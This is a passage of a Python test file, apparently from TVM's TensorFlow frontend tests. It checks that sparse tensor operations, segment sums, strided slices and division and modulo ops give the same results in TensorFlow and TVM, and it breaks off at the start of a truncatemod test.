        ((None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False),
        ((None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True),
        ((None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32", False, False),
        ((None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32", False, False),
        (
            (None, None, None, 5, 6),
            (None, None, None, 6, 5),
            (2, 3, 4, 5, 6),
            (2, 3, 4, 6, 5),
            "float32",
            False,
            False,
        ),
    ]
    for a_sh, b_sh, a_np_sh, b_np_sh, dtype, adj_a, adj_b in cases:
        _test_batch_matmul_dynamic(a_sh, b_sh, a_np_sh, b_np_sh, dtype, adj_a, adj_b)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
    """One sparse_dense_matmul iteration over all adjoint combinations."""
    for adjoint_a in (False, True):
        for adjoint_b in (False, True):
            shape_a = A_inp_shape[::-1] if adjoint_a else A_inp_shape
            shape_b = B_inp_shape[::-1] if adjoint_b else B_inp_shape
            with tf.Graph().as_default():
                sparse_lhs = tf.sparse.SparseTensor(
                    indices=indices, values=values, dense_shape=shape_a
                )
                dense_rhs = tf.placeholder(shape=shape_b, dtype=dtype, name="B")
                if flip:
                    # Dense operand first, so the adjoint flags swap too.
                    result = tf.sparse.sparse_dense_matmul(
                        dense_rhs, sparse_lhs, adjoint_a=adjoint_b, adjoint_b=adjoint_a
                    )
                else:
                    result = tf.sparse.sparse_dense_matmul(
                        sparse_lhs, dense_rhs, adjoint_a=adjoint_a, adjoint_b=adjoint_b
                    )
                rhs_np = np.random.uniform(high=5.0, size=shape_b).astype(dtype)
                compare_tf_with_tvm([rhs_np], [dense_rhs.name], result.name)
def test_forward_sparse_dense_matmul():
    """sparse_dense_matmul op test."""
    # A SparseTensor takes three inputs, e.g.:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    # which densifies to:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    cases = [
        ([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], False),
        ([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], False),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], False),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], False),
        ([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], True),
        ([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], True),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], True),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], True),
    ]
    for indices, values, a_shape, b_shape, flip in cases:
        _test_sparse_dense_matmul(indices, values, a_shape, b_shape, "float32", flip)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
    """Build sparse.fill_empty_rows and compare TF against TVM (VM mode)."""
    with tf.Graph().as_default():
        if not use_dyn:
            indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
            values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
            dense_shape = tf.placeholder(
                shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
            )
        else:
            # Dynamic variant: placeholders carry only rank, not extents.
            indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
            values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
            dense_shape = tf.placeholder(
                shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
            )
        default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
        sparse_in = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
        _ = tf.sparse.fill_empty_rows(sparse_in, default_value, name="sparse_fill_empty_rows")
        # The op yields three outputs: new indices, new values, empty-row indicator.
        compare_tf_with_tvm(
            [indices_np, values_np, dense_shape_np, default_value_int],
            [indices.name, values.name, dense_shape.name, default_value.name],
            [
                "sparse_fill_empty_rows/SparseFillEmptyRows:0",
                "sparse_fill_empty_rows/SparseFillEmptyRows:1",
                "sparse_fill_empty_rows/SparseFillEmptyRows:2",
            ],
            mode="vm",
        )
# Cases cover missing rows, empty sparse tensors (zero-row indices), and a
# rank-3 dense shape; `use_dyn` toggles dynamic-shape placeholders.
@pytest.mark.parametrize(
    "sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
    [
        (
            np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
            np.array([1, 2, 3, 4, 5], dtype=np.int64),
            np.array([5, 6], dtype=np.int64),
            10,
        ),
        (
            np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
            np.array([1, 2, 3, 4], dtype=np.int64),
            np.array([5, 6], dtype=np.int64),
            10,
        ),
        (
            np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
            np.array([1, 2, 3, 4], dtype=np.int64),
            np.array([5, 6], dtype=np.int64),
            10,
        ),
        (
            np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
            np.array([1, 2, 3, 4], dtype=np.int64),
            np.array([7, 7, 7], dtype=np.int64),
            5,
        ),
        (
            np.array([[1], [2]], dtype=np.int64),
            np.array([7, 8], dtype=np.int64),
            np.array([5], dtype=np.int64),
            4,
        ),
        (
            np.ones((0, 1), dtype=np.int64),
            np.array([], dtype=np.int64),
            np.array([5], dtype=np.int64),
            4,
        ),
        (
            np.ones((0, 3), dtype=np.int64),
            np.array([], dtype=np.int64),
            np.array([9, 3, 7], dtype=np.int64),
            100,
        ),
    ],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
    sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
    """sparse_fill_empty_rows op test."""
    ###################################################################
    #
    # In order to create a SparseTensor, it requires 3 input as below:
    # SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # Above Sparse can be represented in Dense as below :
    # [[1, 0, 0, 0]
    # [0, 0, 2, 0]
    # [0, 0, 0, 0]]
    #
    # ------------------------------------------------------------------
    _test_sparse_fill_empty_rows(
        sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
    )
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
    """Build tf.sparse.reshape and compare TF against TVM (VM mode)."""
    with tf.Graph().as_default():
        if not use_dyn:
            indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
            values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
            prev_shape = tf.placeholder(
                shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
            )
            new_shape = tf.placeholder(
                shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
            )
        else:
            # Dynamic variant: placeholders carry only rank, not extents.
            indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
            values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
            prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
            new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
        sparse_in = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
        _ = tf.sparse.reshape(sparse_in, new_shape, name="sparse_reshape")
        compare_tf_with_tvm(
            [indices_np, values_np, prev_shape_np, new_shape_np],
            [indices.name, values.name, prev_shape.name, new_shape.name],
            ["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
            mode="vm",
        )
# Cases include empty sparse tensors, -1 (inferred) dims in the new shape,
# rank changes, and large/sparse index values.
@pytest.mark.parametrize(
    "sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
    [
        (
            np.ones((0, 1), dtype=np.int64),
            np.array([], dtype=np.int64),
            np.array([4], dtype=np.int64),
            np.array([2, -1], dtype=np.int64),
        ),
        (
            np.ones((0, 1), dtype=np.int64),
            np.array([], dtype=np.int64),
            np.array([4], dtype=np.int64),
            np.array([2, 2], dtype=np.int64),
        ),
        (
            np.ones((0, 2), dtype=np.int64),
            np.array([], dtype=np.int64),
            np.array([3, 6], dtype=np.int64),
            np.array([-1, 2], dtype=np.int64),
        ),
        (
            np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([2, 3, 6], dtype=np.int64),
            np.array([-1, 9], dtype=np.int64),
        ),
        (
            np.array(
                [
                    [0, 0, 0, 0, 0],
                    [0, 0, 1, 2, 3],
                    [0, 1, 0, 3, 5],
                    [1, 0, 0, 4, 6],
                    [1, 2, 3, 6, 8],
                ],
                dtype=np.int64,
            ),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([2, 3, 6, 7, 9], dtype=np.int64),
            np.array([9, -1, 7], dtype=np.int64),
        ),
        (
            np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([9, 4], dtype=np.int64),
            np.array([-1], dtype=np.int64),
        ),
        (
            np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([25], dtype=np.int64),
            np.array([5, 5], dtype=np.int64),
        ),
        (
            np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([500, 20], dtype=np.int64),
            np.array([500, 20], dtype=np.int64),
        ),
        (
            np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([500, 20], dtype=np.int64),
            np.array([500, -1], dtype=np.int64),
        ),
        (
            np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
            np.array([7, 5, 6, 3, 9], dtype=np.int64),
            np.array([500, 20], dtype=np.int64),
            np.array([250, 40], dtype=np.int64),
        ),
    ],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
    sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
    """sparse_reshape op test."""
    ###################################################################
    #
    # In order to create a SparseTensor, it requires 3 input as below:
    # SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # Above Sparse can be represented in Dense as below :
    # [[1, 0, 0, 0]
    # [0, 0, 2, 0]
    # [0, 0, 0, 0]]
    #
    # ------------------------------------------------------------------
    _test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
    tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
    """Build one sparse segment op (`tf_op`) and compare TF against TVM (VM mode)."""
    with tf.Graph().as_default():
        if not use_dyn:
            data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
            indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
            segment_ids = tf.placeholder(
                shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
            )
        else:
            # Dynamic variant: placeholders carry only rank, not extents.
            data = tf.placeholder(
                shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
            )
            indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
            segment_ids = tf.placeholder(
                shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
            )
        _ = tf_op(
            data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
        )
        compare_tf_with_tvm(
            [data_np, indices_np, segment_ids_np],
            [data.name, indices.name, segment_ids.name],
            ["sparse_segment_variant:0"],
            mode="vm",
        )
# Cases span 1-D to 4-D data, with and without an explicit num_segments;
# the same table is run against segment_sum, segment_sqrt_n and segment_mean.
@pytest.mark.parametrize(
    "data_np, indices_np, segment_ids_np, num_segments",
    [
        (
            np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
            np.array([0, 3, 4], dtype=np.int32),
            np.array([0, 1, 1], dtype=np.int32),
            None,
        ),
        (
            np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
            np.array([0, 1], dtype=np.int32),
            np.array([0, 2], dtype=np.int32),
            4,
        ),
        (
            np.random.random((6, 4, 5)),
            np.array([0, 2, 4, 3, 1], dtype=np.int32),
            np.array([0, 0, 1, 5, 5], dtype=np.int32),
            100,
        ),
        (
            np.random.random((6, 4, 5)),
            np.array([0, 2, 4, 3, 1], dtype=np.int32),
            np.array([0, 0, 1, 5, 5], dtype=np.int32),
            None,
        ),
        (
            np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
            np.array([0, 1, 2], dtype=np.int32),
            np.array([0, 0, 1], dtype=np.int32),
            None,
        ),
        (
            np.random.random((9, 4, 5, 7)),
            np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
            np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
            9,
        ),
        (
            np.random.random((9, 4, 5, 7)),
            np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
            np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
            None,
        ),
        (
            np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
            np.array([0, 1], dtype=np.int32),
            np.array([0, 2], dtype=np.int32),
            None,
        ),
        (
            np.random.random((9, 4, 5, 7)),
            np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
            np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
            6,
        ),
    ],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
    "tf_op",
    [
        tf.sparse.segment_sum,
        tf.sparse.segment_sqrt_n,
        tf.sparse.segment_mean,
    ],
)
def test_forward_sparse_segment_sum_variants(
    tf_op,
    data_np,
    indices_np,
    segment_ids_np,
    num_segments,
    use_dyn,
):
    """sparse segment sum variants tests"""
    _test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
    """Build tf.math.segment_sum and compare TF against TVM (VM mode)."""
    with tf.Graph().as_default():
        if not use_dyn:
            data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
            segment_ids = tf.placeholder(
                shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
            )
        else:
            # Dynamic variant: placeholders carry only rank, not extents.
            data = tf.placeholder(
                shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
            )
            segment_ids = tf.placeholder(
                shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
            )
        _ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
        compare_tf_with_tvm(
            [data_np, segment_ids_np],
            [data.name, segment_ids.name],
            ["segment_sum:0"],
            mode="vm",
        )
# Cases span 1-D to 4-D data with int32/int64 segment ids.
@pytest.mark.parametrize(
    "data_np, segment_ids_np",
    [
        (
            np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
            np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
        ),
        (
            np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
            np.array([0, 0, 1], dtype=np.int32),
        ),
        (
            np.random.random((6, 4, 5)),
            np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
        ),
        (
            np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
            np.array([0, 0, 1], dtype=np.int32),
        ),
        (
            np.random.random((9, 4, 5, 7)),
            np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
        ),
    ],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
    """math segment sum test"""
    _test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
    """One tf.sparse_to_dense iteration.

    When `default_value` is None the op's implicit default is used; otherwise
    the default is fed through a scalar placeholder.
    """
    with tf.Graph().as_default():
        indices = tf.placeholder(
            shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
        )
        values = tf.placeholder(
            shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
        )
        oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
        # BUG FIX: compare against None with `is`, not `==` (PEP 8). `==` can
        # misbehave when the operand overrides __eq__ (e.g. numpy arrays).
        if default_value is None:
            output = tf.sparse_to_dense(indices, oshape, values)
            compare_tf_with_tvm(
                [sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
            )
        else:
            dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
            output = tf.sparse_to_dense(indices, oshape, values, dv)
            compare_tf_with_tvm(
                [sparse_indices, sparse_values, default_value],
                ["indices:0", "values:0", "default_value:0"],
                output.name,
            )
def test_forward_sparse_to_dense():
    """sparse_to_dense: scalar, vector, and n-D index variants, int and float."""
    shape5 = np.array([5]).astype("int32")
    # scalar index
    _test_sparse_to_dense(np.int32(1), np.int32(3), np.int32(0), shape5)
    # vector of indices
    _test_sparse_to_dense(
        np.array([0, 1, 4]).astype("int32"),
        np.array([3, 3, 3]).astype("int32"),
        np.int32(0),
        shape5,
    )
    # n-D indices
    _test_sparse_to_dense(
        np.array([[0, 0], [1, 2]]).astype("int32"),
        np.array([1, 2]).astype("int32"),
        np.int32(0),
        np.array([3, 4]).astype("int32"),
    )
    _test_sparse_to_dense(
        np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
        np.array([1, 2]).astype("int32"),
        np.int32(4),
        np.array([2, 3, 4]).astype("int32"),
    )
    # float values with an explicit default
    _test_sparse_to_dense(
        np.array([0, 1, 4]).astype("int32"),
        np.array([3.1, 3.1, 3.1]).astype("float32"),
        np.float32(3.5),
        shape5,
    )
    # default value not specified
    _test_sparse_to_dense(
        np.array([0, 1, 4]).astype("int32"),
        np.array([3.1, 3.1, 3.1]).astype("float32"),
        None,
        shape5,
    )
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
    """One tf.sparse.to_dense iteration; inputs are baked into the graph."""
    with tf.Graph().as_default():
        sparse_in = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
        dense_out = tf.sparse.to_dense(sparse_in, default_value=default_value)
        # No placeholders to feed: everything is constant in the graph.
        compare_tf_with_tvm([], [], dense_out.name)
def test_forward_sparse_to_dense_v2():
    """tf.sparse.to_dense with and without an explicit default value."""
    cases = [
        ([[1]], [3.0], [5], None),
        ([[1]], [3.0], [5], 0.3),
        ([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], None),
        ([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], 1.3),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], None),
        ([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], 1.9),
    ]
    for indices, values, shape, default in cases:
        _test_sparse_to_dense_v2(indices, values, shape, "float32", default)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
    """One iteration of tf.sparse.add (sparse + dense operand)."""
    # TODO(ANSHUMAN87): support cuda
    # TODO(ANSHUMAN87): support both sparse input case
    with tf.Graph().as_default():
        sparse_lhs = tf.sparse.SparseTensor(
            indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
        )
        dense_rhs = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        # TODO(ANSHUMAN87): support user input threashold values
        if flip:
            result = tf.sparse.add(dense_rhs, sparse_lhs, threshold=0)
        else:
            result = tf.sparse.add(sparse_lhs, dense_rhs, threshold=0)
        rhs_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
        compare_tf_with_tvm([rhs_np], [dense_rhs.name], result.name, no_gpu=True)
def test_sparse_add():
    """sparse.add op test."""
    # SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    # densifies to:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
    for dtype_inp in ["float32", "float64", "int32"]:
        for flip in (False, True):
            _test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, flip)
        for flip in (False, True):
            _test_sparse_add(
                [[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, flip
            )
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
    ip_shape,
    begin,
    end,
    stride,
    dtype,
    begin_mask=0,
    end_mask=0,
    new_axis_mask=0,
    shrink_axis_mask=0,
    ellipsis_mask=0,
):
    """One iteration of a StridedSlice with the given masks."""
    tf.reset_default_graph()
    input_np = np.random.uniform(size=ip_shape).astype(dtype)
    is_scalar = len(ip_shape) == 0
    with tf.Graph().as_default():
        # For an empty shape list the data is embedded as a constant
        # instead of being fed through a placeholder.
        if is_scalar:
            in_data = tf.constant(input_np, dtype)
        else:
            in_data = tf.placeholder(dtype, ip_shape, name="in_data")
        tf.strided_slice(
            in_data,
            begin,
            end,
            stride,
            begin_mask=begin_mask,
            end_mask=end_mask,
            new_axis_mask=new_axis_mask,
            shrink_axis_mask=shrink_axis_mask,
            ellipsis_mask=ellipsis_mask,
            name="strided_slice",
        )
        if is_scalar:
            compare_tf_with_tvm(None, "", "strided_slice:0")
        else:
            compare_tf_with_tvm(input_np, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
    """test StridedSlice"""
    # scalar and shrink-axis cases
    _test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
    _test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
    _test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
    _test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
    # negative begin/end/stride
    _test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
    # ellipsis mask variants
    _test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
    _test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
    _test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
    _test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
    # new-axis mask, alone and combined with ellipsis
    _test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
    _test_stridedslice(
        [3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
    )
    _test_stridedslice(
        [6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
    )
    # shrink-axis combined with new-axis
    _test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
    _test_stridedslice(
        [3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
    )
    _test_stridedslice(
        [3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
    )
    _test_stridedslice(
        [3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
    )
    # rank-6 inputs exercising every mask kind at once
    _test_stridedslice(
        [3, 4, 5, 4, 5, 6],
        [0, 0, 1, 2, 1],
        [2, 3, 4, 5, 3],
        [1, 1, 2, 2, 1],
        "float32",
        shrink_axis_mask=5,
        new_axis_mask=1,
        ellipsis_mask=2,
        begin_mask=8,
        end_mask=8,
    )
    _test_stridedslice(
        [3, 4, 5, 4, 5, 6],
        [0, 0, 1, 2, 1],
        [2, 3, 4, 5, 3],
        [1, 1, 2, 2, 1],
        "float32",
        shrink_axis_mask=8,
        new_axis_mask=1,
        ellipsis_mask=2,
        begin_mask=5,
        end_mask=5,
    )
    _test_stridedslice(
        [3, 4, 5, 4, 5, 6],
        [0, 0, 1, 2, 1],
        [2, 3, 4, 5, 3],
        [1, 1, 2, 2, 1],
        "float32",
        shrink_axis_mask=16,
        new_axis_mask=1,
        ellipsis_mask=2,
        begin_mask=5,
        end_mask=5,
    )
    _test_stridedslice(
        [3, 4, 5, 4, 5, 6],
        [1, 2, 0, -3],
        [4, 5, 3, 3],
        [2, 2, 1, 1],
        "float32",
        shrink_axis_mask=8,
        new_axis_mask=1,
        ellipsis_mask=2,
        begin_mask=5,
        end_mask=8,
    )
    _test_stridedslice(
        [1, 13, 13, 3, 2],
        [0, 0],
        [1, 1],
        [1, -1],
        "float32",
        ellipsis_mask=1,
        begin_mask=2,
        end_mask=2,
    )
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
    """Elementwise division of two placeholders (RealDiv node)."""
    lhs_np = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
    # Denominator drawn from [1, 100) so it is never zero.
    rhs_np = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, ip_shape, name="numer")
        rhs = tf.placeholder(dtype, ip_shape, name="denomin")
        tf.math.divide(lhs, rhs, name="RealDiv")
        compare_tf_with_tvm([lhs_np, rhs_np], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
    """Floor-division of a placeholder by the constant 5 (FloorDiv node)."""
    lhs_np = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, ip_shape, name="numer")
        tf.math.floordiv(lhs, tf.constant(5, dtype=dtype), name="FloorDiv")
        compare_tf_with_tvm([lhs_np], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
    """test FloorDiv, RealDiv"""
    _test_forward_divide((4,), "int32")
    _test_forward_divide((4, 3, 7), "float32")
    for dtype in ("float32", "int32"):
        _test_forward_floordiv((4, 3, 7), dtype)
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
    """Elementwise floormod of two placeholders (FloorMod node)."""
    lhs_np = np.random.uniform(1, 100, size=in_shape).astype(dtype)
    rhs_np = np.random.uniform(1, 100, size=if_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, in_shape, name="numer")
        rhs = tf.placeholder(dtype, if_shape, name="factor")
        tf.floormod(lhs, rhs, name="FloorMod")
        compare_tf_with_tvm([lhs_np, rhs_np], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
    """test FloorMod"""
    cases = [
        ((10,), (10,), "float32"),
        ((8, 2), (1,), "float32"),
        ((4, 3, 7), (4, 3, 7), "float32"),
        ((4, 3, 7), (4, 3, 7), "int32"),
    ]
    for in_shape, if_shape, dtype in cases:
        _test_forward_floormod(in_shape, if_shape, dtype)
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
    """Elementwise truncatemod of two placeholders."""
    lhs_np = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
    # Divisor drawn from [1, 10) so it is never zero.
    rhs_np = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, ip_shape, name="in_data_1")
        rhs = tf.placeholder(dtype, ip_shape, name="in_data_2")
        tf.truncatemod(lhs, rhs, name="truncatemod")
        compare_tf_with_tvm([lhs_np, rhs_np], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
